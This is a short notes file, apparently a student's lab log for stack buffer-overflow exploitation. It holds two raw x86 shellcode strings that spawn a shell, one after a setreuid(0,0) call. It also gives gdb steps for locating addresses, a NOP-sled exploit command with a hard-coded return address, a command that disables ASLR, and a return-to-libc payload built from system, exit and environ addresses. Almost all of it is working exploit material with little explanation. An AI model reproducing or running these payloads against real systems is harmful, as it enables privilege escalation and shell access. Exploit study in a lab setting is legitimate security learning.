payload for malicious code
\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68
46bytes


\x31\xc0\x83\xec\x01\x88\x04\x24\x68\x2f\x7a\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75\x73\x72\x89\xe6\x50\x56\xb0\x0b\x89\xf3\x89\xe1\x31\xd2\xcd\x80\xb0\x01\x31\xdb\xcd\x80
43 bytes - dont have zsh shell

disas vulnerable
break *<adresa>
x/200xb buffer

info break
del <brakpoint number>

0xffffcd38

run $(python -c 'print "\x90"*222 + "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x38\xcd\xff\xff"')


* return to libc
sudo sysctl -w kernel.randomize_va_space=0

p system
0xf7e3f940

p exit
0xf7e337b0

x/s *((char**)environ)
bin/bash
0xf7f5e00b - treba skontrolovat

run $(python -c 'print "A"*268 + "\x40\xf9\xe3\xf7" + "\xb0\x37\xe3\xf7" + "\x0b\xe0\xf5\xf7"')